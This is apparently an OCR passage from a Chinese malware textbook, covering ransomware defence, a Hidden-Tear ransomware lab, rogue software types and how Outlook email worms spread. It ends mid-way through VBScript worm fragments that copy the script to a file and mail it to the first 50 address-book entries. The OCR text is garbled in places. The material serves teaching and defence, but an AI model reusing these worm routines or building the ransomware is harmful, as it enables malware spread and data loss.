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或 离线 保存 方案 。 

大 部 分 情况 下 ,如 果 被 勒索 型 恶意 代码 感染 了 ,需要 通过 重 装 系统 或 刷机 才能 够 清除 。 
如 果 用 户 有 数据 备份 ,就 可 以 自行 恢复 文件 ,这 样 的 情况 下 就 不 要 交 赎 金 了 。 很 显然 ,备份 
数据 的 存储 设备 的 防护 也 非常 重要 ,如 果 设 备 与 主机 存在 物理 连接 ,也 有 可 能 会 遭受 到 勒索 
型 恶意 代码 的 加 密 操作 。 

企业 级 用 户 可 以 从 限制 最 重要 的 数据 访问 开始 ,然后 严格 监视 网 络 异常 ,只 要 发 现 异 
常 ,可 以 自动 在 安全 的 位 置 创建 文件 备份 。 

不 仅 要 注意 备份 ,而 且 要 测试 备份 恢复 能 力 ,保证 备份 数据 和 备份 恢复 软件 的 可 用 性 同 


8.5.3 网 络 流量 的 检测 


如 果 勒 索 型 恶意 代码 通过 加 密 的 Web 服务 传播 ,就 能 够 绕 过 传统 的 防护 手段 。 因 此 必 
须 采取 支持 SSL 监测 的 防护 手段 ,检测 SSL 加 密会 话 中 存在 的 威胁 。 


8.5.4 网 络 隔离 措施 


勒索 型 恶意 代码 常常 通过 局 域 网 散播 ,企业 应 当 提升 网 络 隔离 的 措施 ,将 关键 业务 程 
序数 据 和 设备 隔离 在 独立 网 络 中 ,有 助 于 防止 来 自 于 网 络 的 感染 。 

蠕虫 式 的 传播 能 力 是 当前 勒索 型 恶意 代码 的 典型 特征 ,而 且 传播 能 力 极 强 。 由 于 勒索 
型 恶意 代码 已 经 可 以 在 局 域 网 内 蠕虫 式 传播 ,因此 ,为 了 防止 勒索 型 恶意 代码 的 扩散 ,应 该 
采取 有 效 的 网 络 隔离 措施 ,将 关键 的 业务 服务 程序 .数据 和 设备 隔离 到 独立 的 网 络 中 ,防止 
来 自 网 络 的 感染 。 


8.5.5 更 新 软件 和 安装 补丁 


由 于 勒索 型 恶意 代码 在 传播 阶段 基本 都 是 利用 了 系统 或 软件 的 漏洞 ,因此 ,漏洞 是 勒索 
型 恶意 代码 的 传播 土壤 ,杜绝 了 漏洞 就 能 防止 勒索 病毒 的 传播 。 正 是 基于 此 ,建议 用 户 及 时 
更 新 系统 中 的 各 种 应 用 软件 ,安装 系统 的 最 新 补丁 。 


8.6 综合 实验 


综合 实验 九 : 勒索 型 恶意 代码 实验 


【实验 目的 】 

(1) 掌握 勒索 型 恶意 代码 的 基本 原理 。 

(2) 学 习 Hidden-Tear 恶意 代码 源 代 码 ,掌握 其 中 的 关键 模块 。 
【实验 环境 】 

(1) Windows 10 操作 系统 。 

(2) Visual Studio 2012 编程 环境 。 

【实验 步骤 】 

(1) 在 编程 环境 中 ,对 Hidden-Tear 源 代码 进行 编译 。 
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(2) 熟悉 AES 加 密 的 原理 ,并 阅读 Hidden-Tear 恶意 代码 的 AES 加 密 模块 的 源 代码 。 
在 掌握 改 源 代码 的 基础 上 ,进行 文件 加 解密 的 尝试 。 

【实验 注意 事项 】 

Hidden-Tear 恶意 代码 能 够 实现 对 测试 环境 的 加 密 。 在 测试 过 程 中 注意 如 下 事项 。 

(1) 不 在 实际 环境 下 测试 ,防止 丢失 真实 文件 或 数据 。 

(2) 掌握 了 解密 代码 后 再 开始 测试 。 

(3) 开始 测试 时 ,备份 测试 文件 。 


8.7 总 结 


从 传统 计算 机 病毒 .蠕虫 、 网 络 钓 鱼 、 间 谍 软 件 、 特 洛 伊 木马 ,到 现在 的 DDoS( 分 布 式 拒 
绝 服务 ) 攻 击 `.APT( 高 级 可 持续 攻击 ) 和 勒索 型 恶意 代码 ,攻击 者 正 把 目光 从 追求 纯 技术 转 
移 到 获取 经 济 利益 上 来 ,这 就 使 用 户 面临 经 济 损失 和 信息 失窃 的 巨大 风险 。 网 络 攻击 技术 、 
社会 工程 学 和 网 络 经 济 学 等 各 种 攻击 手段 ,现在 都 在 被 攻击 者 综合 利用 。 

本 节 主 要 是 帮助 读者 对 勒索 型 恶意 代码 有 个 全 面 的 认识 。 勒 索 型 恶意 代码 主要 通过 加 
密 受 害 者 数据 文件 或 设备 来 达到 勒索 .获取 经 济 利益 的 目的 。 在 勒索 病毒 刚 起 步 的 时 候 , 通 
常 有 很 多 漏洞 ,譬如 私 钥 使 用 明文 保存 在 本 地 加密 算法 可 破解 等 。 然 而 , 随 着 近年 来 勒索 
型 恶意 代码 的 高 速 发 展 ,其 加 密 通 常 不 存在 漏洞 ,也 就 是 说 ,受害 者 基本 上 只 能 依靠 交 赎 金 
来 恢复 数据 。 

因此 ,在 平时 的 生活 、 工 作 中 加 强 勒索 型 恶意 代码 防范 ,增强 危机 意识 才 是 最 好 的 避免 
遭受 勒索 型 恶意 代码 的 方法 。 对 于 企业 而 言 , 除 了 必要 的 网 络 隔离 、 备 份 数据 ` 只 开放 必 
要 端口 漏洞 防护 等 保障 措施 ,还 应 对 企业 员工 进行 定期 计算 机 安全 教育 ,增强 员工 计算 
机 安全 规范 ,从 而 封 堵 勒 索 型 恶意 代码 可 乘 之 机 。 就 个 人 而 言 ,定期 备份 数据 ,加 强 口令 
强度 ,不 随便 打开 网 页 .邮件 等 渠道 的 链接 或 文件 ,都 能 极 大 降低 遭遇 勒索 型 恶意 代码 的 
风险 。 

勒索 型 恶意 代码 已 成 为 一 条 高 度 发 展 、 经 济 利益 巨大 的 地 下 黑客 产业 生产 链 , 作 为 信息 
安全 工作 者 ,更 加 需要 对 勒索 型 恶意 代码 进行 深入 的 分 析 , 从 而 加 强 防范 技术 ,还 计算 机 网 
络 一 片 朗朗 乾坤 。 


8.8 习 题 
一 、 填 空 题 
1. 勒索 型 恶意 代码 是 一 种 以 为 目的 的 恶意 软件 一 一 黑客 使 用 技术 手段 动 
持 或 ,并 以 此 为 条 件 向 用 户 勒索 钱财 的 一 种 恶意 攻击 手段 。 
2. 勒索 型 恶意 代码 有 两 种 形式 ,分 别 是 和 
二 、 选 择 题 


1. 从 技术 上 讲 ,勒索 型 恶意 代码 包括 的 模块 有 ( “) 模 块 。 


226 计算 机 病毒 与 恶意 代码 一 一 原理 、 技 术 及 防范 (第 4 版 ) 


A. 补丁 下 载 B. 勒索 
C. 蠕虫 D. 漏洞 利用 
2. 勒索 型 恶意 代码 常用 的 加 密 算法 包括 ( hs 
A. 自 定义 加 密 算 法 B. 对 称 加 密 算法 
C. 对 称 - 非 对 称 加 密 算法 D. 非 对 称 加 密 算法 
三 、 思 考题 


1. 什么 是 勒索 型 恶意 代码 ? 
2. 举例 说 明 一 款 勒 索 型 恶意 代码 的 攻击 方式 。 
3. 试 论 述 防 范 勤 索 型 恶意 代码 的 措施 (要 求 措施 和 攻击 手段 对 应 阐述 ) 。 


第 9 音 其 他 恶意 代码 


当前 ,感染 可 执行 文件 .数据 文件 和 引导 区 的 恶意 代码 已 经 是 过 去 时 ,蠕虫 .特洛伊 森 
马 、 网 络 僵尸 和 Rootkit 才 是 恶意 代码 的 进行 时 。 其 中 ,DDoS( 一 般 由 僵尸 网 络 作为 攻击 手 
段 , 因 此 经 常 被 等 价 为 僵尸 网 络 ) 和 APT 是 安全 领域 公认 的 最 难 对 付 的 两 个 攻击 方式 。 鉴 
于 此 ,本 章 重点 探讨 一 些 采 用 特殊 技术 编制 的 新 型 恶意 代码 ,以 使 读者 了 解 最 流行 的 恶意 
代码 。 

本 章 学 习 目标 

(1) 了 解 流氓 软件 和 Rootkit 恶意 代码 。 

(2) 掌握 网 络 僵尸 的 基本 原理 。 

(3) 掌握 Outlook 漏洞 的 恶意 代码 。 

(4) 掌握 WebPage 恶意 代码 。 

(5) 了 解 APT(Advanced Persistent Threat) 的 基本 原理 。 


9.1 流氓 软件 


“流氓 软件 ?是 一 个 新 生 的 词汇 , 它 源 自 网 络 。 近 年 来 ,一 些 * 流 起 软件 ?引起 了 用 户 和 媒 
体 的 强烈 关注 。 它 们 往往 采用 特殊 手段 频繁 弹出 广告 窗口 ,危及 用 户 隐 私 , 严 重 干 扰 用 户 的 
日 常 工作 ,数据 安全 和 个 人 隐私 。 这 些 软 件 在 计算 机 用 户 中 引起 了 公愤 ,许多 人 指责 它们 为 
“彻头彻尾 的 流 谍 软件 ”"。 流 谍 软 件 的 泛滥 ,成 为 因特网 安全 的 新 威胁 。 


9.1.1 流氓 软件 的 定义 


迄今 为 止 ,流氓 软件 还 没有 一 个 被 大 家 公认 的 统一 定义 。 中 国 反 流氓 软件 联盟 和 奇 虎 
360 公司 都 试图 统一 流 谍 软件 的 定义 ,但 都 没有 成 功 。 

第 一 个 定义 : 流氓 软件 是 指 具 有 一 定 的 实用 价值 但 具备 计算 机 恶意 代码 和 黑客 的 部 分 
行为 特征 的 软件 。 它 处 在 合法 软件 和 恶意 代码 之 间 的 灰色 地 带 ,使 用 户 无 法 卸载 ,并 强行 弹 
出 广告 和 窃取 用 户 的 私人 信息 等 。 

第 二 个 定义 : 流氓 软件 是 介 于 恶意 代码 和 正规 软件 之 间 , 同 时 具备 正常 功能 (下 载 、 媒 
体 播放 等 ) 和 恶意 行为 ( 弹 广告 . 开 后 门 ) 的 软件 ,给 用 户 带 来 实质 危害 。 

总 之 , 流 谍 软件 是 对 网 络 上 散播 的 符合 如 下 条 件 的 软件 的 一 种 称呼 。 

(1) 采用 多 种 社会 和 技术 手段 ,强行 或 者 秘密 安装 ,并 抵制 卸载 。 

(2) 强行 修改 软件 设置 ,如 浏览 器 主页 .软件 自动 启动 选项 及 安全 选项 等 。 

(3) 强行 弹出 广告 ,或 者 其 他 干扰 用 户 、 占 用 系统 资源 行为 。 

(4) 有 侵害 用 户 信 息 和 财产 安全 的 潜在 因素 或 者 隐患 。 

(5) 未 经 许可 ,或 者 利用 用 户 下 忽 或 缺乏 相关 知识 ,秘密 收集 用 户 个 人 信息 、 秘 密 和 隐私 。 
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9.1.2 应 对 流 误 软 件 的 政策 


流氓 软件 已 经 成 为 世界 各 国共 同 关 注 的 焦点 ,国外 监管 制度 相对 较为 完善 。2004 年 ， 
美国 犹他 州 通过 了 第 一 个 针对 间谍 软件 的 立法 Spyware Control Act ,此 后 又 有 18 个 州 完 
成 了 此 项 立法 。 我 国 现 阶 段 仍然 缺乏 完善 的 法 律 和 政策 。 监 管 政策 缺失 、 商 业 利 益 驱 动 及 
网 民 防 范 意识 淡薄 等 成 为 流氓 软件 独 狐 的 主要 原因 。 

我 国 积极 开展 治理 流 谍 软 件 活动 。 北 京 市 网 络 行 业 协会 于 2005 年 6 月 召开 了 首次 防 
治 流 谍 软 件 的 研讨 会 。 新 浪 、 搜 狐 、 网 易 、 瑞 星 、 江 民 等 16 家 企业 会 后 起 草 了 《软件 产品 行为 
安全 自律 公约 》。2006 年 9 月 4 日 ,一 个 非 营 利 性 的 专门 打击 流 谍 软 件 的 民间 组 织 一 一 中 
国 反 流 起 软件 联盟 成 立 。 

自 2006 年 以 来 ,网 民 、 媒 体 、 信 息 安 全 厂商 .主管 部 门 和 行业 协会 等 纷纷 采取 措施 打击 
日 益 猩 狐 的 流氓 软件 一 一 以 反 流氓 软件 联盟 为 代表 的 网 民 起 诉 相关 企业 、 信 息 安 全 厂商 对 
流氓 软件 进行 查 杀 ,行业 协会 倡导 行业 自律 \ 信 息 产 业 部 公布 举报 电话 接受 投诉 及 媒体 频繁 
曝光 等 。 此 外 ,国家 已 开始 把 对 流 谍 软 件 的 检测 纳入 到 杀毒 软件 的 检测 标准 之 中 。 在 各 方 
力量 强大 的 打击 下 ,部 分 流氓 软 件 生产 者 开始 放弃 或 减少 流 谍 软件 的 制作 和 传播 ,流氓 软件 
的 侵扰 行为 也 有 所 收敛 。 


9.1.3 ”流氓 软件 的 主要 特征 

以 创作 者 而 言 , 流 谍 软 件 与 恶意 代码 或 者 蠕虫 不 同 。 大 多 数 恶 意 代码 是 由 小 团体 或 者 
个 人 秘密 编写 和 散播 的 ; 而 流氓 软件 则 涉及 很 多 知名 企业 和 团体 。 流 氓 软件 可 能 造成 计算 
机 运行 变 慢 ,浏览 器 异常 等 。 多 数 流氓 软件 具有 以 下 特征 。 

1. 强迫 性 安装 

(1) 不 经 用 户 许可 自动 安装 。 

(2) 不 给 出 明显 提示 ,欺骗 用 户 安装 。 

(3) 反复 提示 安装 ,使 用 户 不 胜 其 烦 而 不 得 不 安装 等 。 

2. 无 法 卸载 或 印 载 困难 

(1) 正常 手段 无 法 卸载 。 

(2) 无 法 完全 印 载 。 

(3) 不 提供 印 载 程序 ,或 者 提供 的 印 载 程序 不 能 用 等 。 

3. 干扰 正常 使 用 

(1) 频繁 弹出 广告 窗口 。 

(2) 引导 使 用 某 功 能 等 。 

4. 具有 恶意 代码 和 黑客 特征 

(1) 窃取 信息 。 

(2) 耗费 计算 机 资源 等 。 
9.1.4 流 误 软件 的 发 展 过 程 


中 国 流 谍 软 件 的 发 展 在 经 历 了 恶意 网 页 代码 和 插件 时 代 后 ,有 了 进一步 发 展 : 反 浏 览 
器 支持 、 反 恶意 插件 和 广告 过 滤 等 工具 依次 出 现 ,这 进一步 强化 了 流氓 软件 功能 及 推广 方 
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式 。2005 年 流氓 软件 开始 利用 共享 软件 进行 推广 ,2006 年 开始 呈现 病毒 化 的 发 展 趋势 , 恶 
劣 行为 变本加厉 ,严重 干扰 了 网 民 的 正常 使 用 ,损害 网 民 的 合法 权益 。 

1. 恶意 网 页 代码 时 代 (2001 一 2002 年 ) 

自 2001 年 开始 , 某 些 黄 色 网 站 和 中 小 型 网 站 通过 修改 浏览 器 主页 的 方法 提高 网 站 访问 
量 。 它 们 在 其 网 站 页 面 中 放置 一 段 恶 意 代码 , 当 用 户 浏 览 这 些 网 站 时 , IE 浏览 器 主页 会 被 
修改 。 当 下 次 打开 浏览 器 时 会 首先 打开 这 些 网 站 ,从 而 提高 其 访问 量 , 这 一 做 法 在 当时 非常 
流行 。 由 于 修改 浏览 器 主页 只 是 对 IE 浏览 器 进行 简单 的 设置 ,用 户 可 以 将 首页 重新 改 芭 
来 ,因此 这 种 方法 并 没有 完全 实现 这 些 不 良 网 站 的 推广 企图 。 

随后 ,不 少 中 小 型 网 站 开始 采用 更 加 恶意 的 方法 。 它 们 通过 恶意 网 页 代码 直接 对 计算 
机 的 注册 表 进 行 修改 ,对 一 些 系统 功能 进行 限制 。“ 万 花 谷 病毒 就 是 典型 的 代表 。 针 对 这 
一 情况 ,杀毒 软件 公司 研发 的 网 页 监控 和 注册 表 监 控 两 大 技术 从 根本 上 解决 了 此 类 问题 。 
这 类 恶意 网 页 代码 方式 渐渐 失去 了 生存 空间 。 

2. 插件 时 代 (2003 一 2005 年 ) 

从 2003 年 开始 ,中 国 互联 网 出 现 了 一 种 称 为 “网 络 实名 ”( 也 称 为 "中文 上 网 ”的 新 业务 
形式 。 网 络 实名 的 作用 是 将 中 文 解 析 成 对 应 的 网 址 ,使 用 户 输入 中 文 的 公司 或 网 站 名 称 时 
能 够 打开 它们 的 网 站 。 

要 想 将 中 文 解 析 成 网 址 ,需要 在 用 户 的 计算 机 上 安装 一 个 插件 程序 。 因 此 ,网 络 实名 要 
想 提 升 其 品牌 价值 ,就 必须 将 插件 安装 到 更 多 的 计算 机 上 ,占领 尽 可 能 多 的 客户 端 。 网 络 实 
名 通过 与 大 量 的 网 站 进行 合作 ,放置 其 插件 程序 , 当 用 户 访问 这 些 网 站 时 就 会 被 自动 安装 上 
网 络 实名 插件 ,并 且 无 法 卸载 。 

由 于 网 络 实名 取得 了 巨大 的 经 济 收益 ,促使 其 他 的 厂商 也 推出 了 具有 同 质 化 功能 的 插 
件 程序 。 为 了 争夺 市 场 ,提供 网 络 实名 业务 的 公司 之 间 开 始 “ 互 杀 ”, 软 件 安装 后 会 试图 删除 
竞争 对 手 的 插件 ,将 用 户 的 计算 机 变 成 “战场 ,甚至 一 些 厂 商 为 此 对 秒 公 和 党。 由 于 插件 间 的 
恶性 竞争 ,在 “ 互 杀 ”的 过 程 中 往往 造成 用 户 计 算 机 频繁 死机 和 蓝屏 等 不 正常 症状 。 

到 了 2005 年 年 初 , 越 来 越 多 的 国内 因特网 厂商 从 网 络 实名 厂商 间 的 竞争 中 认识 到 插件 
推广 的 绝 佳 效果 ,于 是 纷纷 推出 自己 的 插件 。 这 使 得 用 户 在 浏览 一 些 网 站 时 ,常常 被 安装 了 
无 数 个 插件 和 工具 条 软件 。 随 着 这 种 情况 愈演愈烈 ,用 户 开始 控诉 此 类 插件 ,并 形象 地 将 这 
些 不 请 自 来 的 软件 称 为 “流氓 软件 ”。 

3. 软件 捆绑 时 代 (2005 年 至 今 ) 


随 着 反 流氓 软件 工具 的 推出 ,流氓 软 件 厂商 遭受 到 了 沉重 的 打击 。 一 些 因特网 厂商 被 
迫 寻 找 新 的 推广 方式 ,于 是 他 们 开始 尝试 用 共享 软件 捆绑 的 方式 ,向 用 户 的 计算 机 中 安插 流 
谍 软 件 。 这 些 厂商 网 软 了 多 种 知名 共享 软件 的 作者 ,将 自身 的 产品 与 共享 软件 捆绑 ,并 支付 
一 定 费用 。 当 安装 这 些 共享 软 件 时 ,会 同时 被 强制 安装 流氓 软件 , 且 无 法 卸载 。 

由 于 中 国 的 共享 软件 体制 尚 不 完善 ,盗版 问题 仍然 比较 严重 ,很 多 共享 软件 刚刚 推出 即 
遭 到 破解 。 共 享 软件 作者 很 难 从 软件 注册 费 中 获取 收益 ,因此 纷纷 通过 推广 流氓 软件 来 件 
利 。 这 一 时 期 曾经 出 现 过 一 个 共享 软件 捆绑 安装 十 余 个 流氓 软件 的 情况 。 另 一 方面 ' 有 的 
消费 类 厂商 由 于 通过 流氓 软件 弹出 广告 覆盖 面 广 .营销 对 象 确定 及 利润 来 源 稳定 ,也 开始 给 
流氓 软件 发 布 者 投放 广告 ,这 使 得 整个 流 谍 软 件 产 业 形成 了 完整 的 链条 。 


230 计算 机 病毒 与 恶意 代码 一 一 原理 、 技 术 及 防范 (第 4 版 ) 


流氓 软件 处 于 病毒 与 正规 软件 中 间 的 灰色 地 带 。 它 们 虽然 带 有 强制 安装 、 弹 出 广告 .无 
法 卸载 等 恶意 特征 ,但 也 同时 具有 用 户 需要 的 一 些 正 常 软件 功能 。 因 此 ,很 难 将 其 定义 为 病 
毒 。 由 于 我 国 还 没有 针对 流 谍 软 件 的 相关 法 律 法 规 出 台 , 反 病毒 公司 只 能 以 发 布 自律 书 、 规 
范 软 件 编写 的 形式 来 呼吁 业界 自觉 对 流氓 软件 行为 进行 抵制 。 这 种 情况 虽然 给 流氓 软件 厂 
商 带 来 了 一 定 的 压力 ,但 是 并 未 从 根本 上 彻底 解决 流氓 软 件 问题 ,而 由 于 利益 驱动 , 越 来 越 
多 的 厂商 开始 通过 流氓 软件 推广 产品 和 网 站 ,其 至 通过 占领 用 户 的 计算 机 来 弹出 广告 业务 。 

4. 流氓 软件 病毒 化 时 代 (2006 年 下 半年 至 今 ) 

迫 于 技术 和 和 与 论 的 压力 ,制作 流氓 软件 的 厂商 开始 两 极 分 化 。 一 些 大 牌 因 特 网 厂商 逐 
渐 将 软件 的 恶意 程度 降低 ,还 有 一 些 厂 商 干脆 放弃 推广 流 霞 软件。 然而 , 仍 有 大 量 的 中 小 三 
商 是 通过 流氓 软件 起 家 的 ,通过 流氓 软件 进行 广告 推广 已 经 成 为 其 公司 的 主要 其 至 是 唯一 
的 收入 来 源 。 从 2006 年 下 半年 开始 ,一 些 三 商 为 了 生存 ,不 异 狂 而 走 险 ,使 用 更 加 卑劣 的 手 
段 进行 流氓 软件 的 推广 ,并 且 采 用 更 加 恶毒 的 技术 公然 向 反 病毒 软件 , 反 流 谍 软件 工具 挑 
战 。 据 瑞星 公司 客户 服务 中 心 的 统计 数据 表明 ,从 2006 年 6 月 开始 ,用 户 计算 机 由 于 流氓 
软件 问题 导致 崩溃 的 求助 数量 已 经 超过 了 病毒 。 这 一 时 期 的 流 谍 软 件 有 以 下 两 大 特点 。 

(1) 编写 病毒 化 。 不 少 流氓 软件 为 了 防止 被 杀毒 软件 或 流氓 软件 卸载 工具 发 现 , 采 用 
了 病毒 常用 的 Rootkit 技术 进行 自我 保护 。Rootkit 可 以 对 自身 及 指定 的 文件 进行 隐藏 或 
锁定 ,防止 被 发 现 和 删除 。 更 有 一 些 流氓 软件 采用 自杀 式 技 术 攻击 杀毒 软件 。 一 旦 发 现 用 
户 安装 或 运行 杀毒 软件 , 便 运行 恶意 代码 ,直接 造成 计算 机 死机 、 蓝 屏 , 让 用 户 误 以 为 是 杀毒 
软件 存在 问题 。 
(2) 传播 病毒 化 。 为 了 达到 更 好 的 传播 效果 ,并 减少 成 本 ,不 少 中 小 厂商 直接 使 用 病毒 
进行 流 湛 软件 的 推广 。 用 户 的 计算 机 感染 病毒 后 ,病毒 会 自动 在 后 台 运 行 , 下 载 并 安装 流 谍 
软件 。 同 时 ,流氓 软件 安装 后 也 会 从 因特网 上 自动 下 载 并 运行 病毒 。 


9.1.5 流氓 软件 的 分 类 


根据 不 同 的 特征 和 人 危害 ,困扰 广大 计算 机 用 户 的 流 谍 软 件 的 主要 类 型 如 下 。 

1. 广告 软件 

广告 软件 (Adware) 是 指 未 经 用 户 允 许 , 下 载 并 安装 在 用 户 计 算 机 上 ,或 者 与 其 他 软件 
捆绑 ,通过 弹出 式 广告 等 形式 牟取 商业 利益 的 程序 。 此 类 软件 安装 后 ,在 后 台 收 集 用 户 信 息 
牟利 ,危及 用 户 隐私 ; 或 频繁 弹出 广告 消耗 系统 资源 、 使 系统 运行 变 慢 ,干扰 用 户 正 常 使 用 。 
安装 了 某 下 载 软件 后 ,会 一 直 弹 出 带 有 广告 内 容 的 窗口 ,干扰 正常 使 用 。 还 有 一 些 软件 安装 
后 ,会 在 正 浏 览 器 的 工具 栏 位 置 添 加 与 其 功能 不 相干 的 广告 图 标 , 普 通用 户 很 难 将 其 清除 。 

2. 间谍 软件 

间谍 软件 (Spyware) 是 一 种 能 够 在 用 户 不 知情 的 情况 下 ,在 其 计算 机 上 安装 后 门 程序 、 
收集 用 户 信 息 的 软件 。 用 户 的 隐私 数据 和 重要 信息 会 被 后 门 程序 捕获 ,并 被 发 送 给 黑客 和 
商业 公司 等 。 这 些 后 门 程序 甚至 能 使 用 户 的 计算 机 被 远程 操控 ,组 成 庞大 的 僵尸 网 络 ,这 是 
目前 网 络 安全 的 重要 隐患 之 一 。 

3. 浏览 器 动 持 

浏览 器 支持 是 一 种 恶意 程序 ,通过 浏览 器 插件 .BHO( 浏 览 器 辅助 对 象 ) 及 WinSock 
LSP 等 形式 对 浏览 器 进行 自 改 ,使 浏览 器 配置 不 正常 ,被 强行 引导 到 商业 网 站 。 用 户 在 浏 


第 9 章 其 他 恶意 代码 2 


览 网 站 时 会 被 强行 安装 此 类 插件 ,普通 用 户 根本 无 法 将 其 印 载 ,被 劫持 后 ,只 要 上 网 就 会 被 
强行 引导 到 其 指定 的 网 站 ,严重 影响 正常 上 网 浏览 。 一 些 不 良 站 点 会 频繁 弹出 安装 窗口 , 迫 
使 用 户 安装 某 浏览 器 插件 ,甚至 根本 不 征求 用 户 意见 ,利用 系统 漏洞 在 后 台 强 制 安装 到 计算 
机 中 。 这 种 插件 还 采用 了 不 规范 的 软件 编写 技术 (此 技术 通常 被 病毒 使 用 ) 来 逃避 和 印 载 , 往 
往 会 造成 浏览 器 错误 、 系 统 异常 重启 等 。 

4. 行为 记录 软件 

行为 记录 软件 (Track Ware) 是 指 未 经 用 户 许 可 ,窃取 并 分 析 用 户 隐私 数据 ,记录 用 户 
计算 机 使 用 习惯 网 络 浏览 习惯 等 个 人 行为 的 软件 。 行 为 记录 软件 危及 用 户 隐 私 , 可 能 被 黑 
客 利用 进行 网 络 诈骗 。 一 些 软件 会 在 后 台 记 录用 户 访问 过 的 网 站 并 加 以 分 析 , 有 的 甚至 会 
发 送 给 专门 的 商业 公司 或 机 构 ,此 类 机 构 会 据 此 宕 测 用 户 的 爱好 ,并 进行 相应 的 广告 推广 或 
商业 活动 。 

5. 恶意 共享 软件 

恶意 共享 软件 (Malicious Shareware) 是 指 某 些 共享 软件 为 了 获取 利益 ,采用 诱骗 手段 、 
试用 陷阱 等 方式 强迫 用 户 注册 ,或 者 在 软件 体内 拥 绑 各 类 恶意 搬 件 ,未 经 允许 即将 其 安装 到 
计算 机 中 。 和 恶意 共享 软件 使 用 试用 陷阱 强迫 用 户 进 行 注 册 , 否 则 可 能 会 丢失 个 人 资料 等 数 
据 。 软 件 集成 的 插件 可 能 会 造成 浏览 器 被 动 持 、 隐 私 被 窃取 等 。 例 如 ,安装 某 款 媒体 播放 软 
件 后 ,会 被 强迫 安装 与 播放 功能 毫 不 相干 的 软件 (搜索 插件 、 下 载 软件 ) 却 不 给 出 明确 提示 ， 
并 且 印 载 播放 器 软件 时 不 会 自动 印 载 这 些 附加 安装 的 软件 。 


9.2 利用 Outlook 漏洞 的 恶意 代码 


随 着 Internet 的 迅猛 发 展 ,电子 邮件 已 经 成 为 人 们 相互 交流 最 常 使 用 的 工具 ,因此 它 也 
成 为 新 型 恶意 代码 一 一 电子 邮件 型 恶意 代码 的 重要 载体 。 最近 两 年 ,出 现 了 许多 危害 极 大 
的 邮件 型 恶意 代码 ,如 * 爱 虫 (I Love You)”“ 美 丽 莎 (Melissa)”“ 库 尔 尼 科 娃 ”"“ 主 页 
(HomePage)” 和 “欢乐 时 光 (HappyTime)” 等 。 这 些 恶 意 代码 主要 通过 Outlook 的 可 编程 
特性 实现 。 在 收 件 人 使 用 Outlook 打开 邮件 或 附件 时 ,里 面 的 恶意 代码 就 会 自动 激活 并 向 
通讯 录 中 的 所 有 人 发 送 带 恶意 代码 的 邮件 (恶意 代码 附 在 附件 或 邮件 体内 ), 从 而 导致 恶意 
代码 的 大 规模 迅速 传播 ,最 终 导 致 邮件 服务 器 耗 尽 资源 而 瘫痪 。 


9.2.1 邮件 型 恶意 代码 的 传播 方式 


由 于 Outlook 对 恶意 代码 的 传播 能 力 特别 强 , 因 此 ,业界 戏称 “在 现 有 恶意 代码 中 ,口中 
疫 是 唯一 不 能 通过 Outlook 传播 的 一 种 病毒 ”。 根 据 恶意 代码 和 邮件 结合 方式 不 同 , 可 以 将 
恶意 代码 分 为 如 下 几 类 。 

1. 附件 方式 

恶意 代码 的 主要 部 分 就 隐藏 在 附件 中 。 由 于 这 种 方式 简单 易 行 ,大 多 数 电 子 邮 件 型 恶 
意 代码 都 采用 这 种 方式 。 例 如 ,主页 ”"(HomePage) 和 * 爱 虫 ”(I Love You) ,它们 的 附件 是 
VBS 文 件 , 也 就 是 恶意 代码 的 关键 部 分 。 

2. 邮件 本 身 

恶意 代码 并 不 置身 于 附件 ,而 是 藏身 于 邮件 体 之 中 。 该 类 型 的 恶意 代码 隐蔽 性 更 强 。 
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例如 ,著名 的 “欢乐 时 光 ”(HappyTime) 就 藏身 于 邮件 体 中 ,一 旦 用 户 移动 鼠标 指针 至 带 病 
毒 的 邮件 上 ,还 未 阅读 邮件 计算 机 就 已 经 感染 病毒 了 。 

3. 嵌入 方式 

恶意 代码 仅仅 把 电子 邮件 作为 其 传播 手段 。 例如,“ 美丽 莎 ”(Melissa) 是 一 种 隐蔽 性 、 
传播 性 极 大 的 Word 97/Word 2000 宏 病 毒 。 尽 管 其 核心 内 容 是 宏 病 毒 ,但 在 其 体内 有 一 段 
代码 专门 用 来 传播 。 当 条 件 符合 时 ,打开 电子 邮件 地 址 ,向 前 50 个 地 址 发 送 被 感染 的 邮件 。 


9.2.2 邮件 型 恶意 代码 的 传播 原理 


Outlook 的 编程 简单 化 .与 脚本 的 高 度 集成 及 结构 复杂 等 特性 被 病毒 编制 者 轻松 利用 ， 
导致 其 成 为 恶意 代码 的 传播 途径 。 恶 意 代 码 要 想 传播 必须 将 自身 复制 并 借助 其 他 邮件 或 本 
身 发 送出 去 ,Outlook 传播 的 恶意 代码 基本 上 都 是 由 VBScript 编写 的 ,其 自我 复制 的 原理 
基本 上 是 利用 程序 将 本 身 的 脚本 内 容 复制 一 份 到 一 个 临时 文件 ,然后 在 传播 的 环节 将 其 作 
为 附件 发 送出 去 。 下 面 看 看 脚本 是 怎么 样 完成 这 个 功能 的 。 


Setfso = CreateObject("Scripting. FileSystemObject") 
fso. GetFile(WScript. ScriptFullName). Copy("C:\temp. vbs") 


这 两 行 代码 就 可 以 将 自身 复制 到 C 盘 根 目录 下 的 temp. vbs 文件 。 第 一 行 是 创建 一 个 
文件 系统 对 象 ,第 二 行 前 面 是 打开 这 个 脚本 文件 ,WScript. ScriptFullName 指明 是 这 个 程序 
本 身 , 是 一 个 完整 的 路 径 文件 名 。GetFile 函数 获得 这 个 文件 ,Copy 函数 将 这 个 文件 复制 到 
C 盘 根 目录 下 的 temp. vbs 文件 。 这 就 是 大 多 数 恶意 代码 制作 者 利用 VBScript 编写 恶意 代 
码 的 一 个 特点 。 从 这 里 可 以 看 出 ,禁止 了 FileSystemObject 这 个 对 象 就 可 以 很 有 效 地 控制 
这 种 恶意 代码 的 传播 。 


铺 注意 ; 若 要 禁止 文件 系统 对 象 , 可 以 用 下 面 的 这 条 命令 。 


regsvr32 scrrun.dll /u 


恶意 代码 需要 传播 ,电子 邮件 恶意 代码 无 疑 是 通过 电子 邮件 传播 的 。 对 于 Outlook 来 
说 ,地 址 敌 的 功能 相当 不 错 ,可 是 也 给 恶意 代码 的 传播 打开 了 方便 之 门 。 几 乎 所 有 通过 
Outlook 传播 的 电子 邮件 恶意 代码 都 是 向 地 址 短 中 存储 的 电子 邮件 地 址 发 送 内 容 相同 的 脚 
本 附件 完成 的 。 如 下 的 代码 实现 了 传播 功能 。 


Set ola = Create0bject("Outlook.Rpplication" ) 
On Error Resume Next 
For x=1 To 50 
Set Mail = ola. CreateItem(0) 
Mail. to = ola. GetNameSpace( "MAPI"). AddressLists(1). AddressEntries(x) 
